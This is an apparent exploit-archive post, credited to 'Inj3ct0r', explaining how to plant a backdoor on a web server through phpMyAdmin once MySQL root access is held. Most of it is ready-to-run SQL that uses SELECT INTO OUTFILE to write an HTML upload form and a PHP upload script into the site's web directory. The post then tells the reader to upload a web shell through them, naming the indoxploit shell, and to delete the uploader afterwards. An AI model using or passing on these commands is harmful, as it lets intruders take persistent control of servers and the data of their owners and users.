کد:
################################################################ |--------------------------------------------------------------| |[+] Exploit Title: Upload Backdoor Lewat MySQL Database (phpMyAdmin) |[+] Date: 08/10/2018 |[+] Exploit Author : Inj3ct0r |[+] Tested on: Windows 10 and kali |[+] MY pageExploit: https://www.exploit-db.com/author/?a=2243 |[+] MY page https://cxsecurity.com/author/Inj3ct0r ||[+] MY page http://www.exploit4arab.org/author/308/Rednofozi |[+] ME:Rednfozi@yahoo.com |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |[+] fb.me :https://www.facebook.com/saeid.hat.3 |--------------------------------------------------------------| ################################################################ 1-|Maybe it's been discussed a lot on Google. But since again you are not busy trying to make the article just maybe someone is not familiar with google tutors. So uploading the shell via phpmyadmin is very possible, of course with the terms of certain conditions. 2-the following are the conditions for being able to upload the shell via phpmyadmin: Mysql root user or root equivalent (have all privileges) Know the location or directory of the target website running. Okay, in this tutorial I have fulfilled these two conditions. The root user knows the location of the web. IN this tutorial for example I use Windows Server. For linux server the same way, just adjust the directory. Okay, straight away: 3-Enter the command menu and enter the following code: use mysql; DROP TABLE IF EXISTS `temptab`; CREATE TABLE temptab (codetab text); INSERT INTO temptab (codetab) values ('<form enctype="multipart/form-data" action="upload.php" method="post"><pre lang="html">Upload file :<form enctype="multipart/form-data" action="upload2.php" method="post"><input name="userfile" type="file" /><input type="submit" value="Upload" /></form>'); SELECT * INTO OUTFILE 'C:/server/htdocs/upload2.php' from temptab; DROP TABLE temptab; FLUSH LOGS; 4-Change the bold with the directory from the website. This command is used to create an upload form on the victim's website with the name upload2.php Okay again. Now enter the following code: use mysql; DROP TABLE IF EXISTS `temptab`; CREATE TABLE temptab (codetab text); INSERT INTO temptab (codetab) values ('<?php $uploaddir = "C:/server/htdocs/";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);echo " <pre>";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "";?>'); SELECT * INTO OUTFILE 'C:/server/htdocs/upload.php' from temptab; DROP TABLE temptab; FLUSH LOGS; 5-This command is to make the upload function from the upload2.php file. Okay now we try to call the file via a web browser. Adjust the path you entered in the mysql command. What is called is upload2.php Well, you will get an uploader. Just upload your shell through it, and delete the uploader. For the shell if it's not available, you can use the indoxploit shell. ----------------------------------------------------------------------------------- ---------------------------------------------------------------------------------- # Discovered by : Inj3ct0r #--tnx to : Habili